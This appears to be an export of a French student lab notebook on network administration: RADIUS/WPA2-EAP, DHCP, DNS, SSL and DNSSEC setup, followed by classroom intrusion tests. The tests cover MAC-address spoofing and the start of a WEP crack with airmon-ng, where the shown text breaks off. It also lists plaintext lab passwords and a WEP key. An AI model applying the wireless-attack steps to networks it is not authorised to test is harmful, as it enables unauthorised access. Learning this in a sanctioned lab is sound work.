root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.3.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle, tout comme nous arrivons à pinger des Vm d'autres groupes depuis notre eeePC.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/freeradius# ping 10.60.3.2&lt;br /&gt;
PING 10.60.3.2 (10.60.3.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=1 ttl=255 time=1.30 ms&lt;br /&gt;
64 bytes from 10.60.3.2: icmp_seq=2 ttl=255 time=1.96 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DCHP ====&lt;br /&gt;
&lt;br /&gt;
Pour cette partie, nous avons d'abord installer le paquet isc-dhcp-server.&lt;br /&gt;
Ensuite, nous avons modifier le fichier dhcpd.conf :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
option domain-name &amp;quot;jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.162;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.3.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.3.10 10.60.3.40;&lt;br /&gt;
      option routers 10.60.3.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite isc-dhcp-server pour rajouter l'interface wlan0 : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
INTERFACES=&amp;quot;wlan0&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35902</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35902"/>
				<updated>2016-12-12T10:24:25Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Sécurisation Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
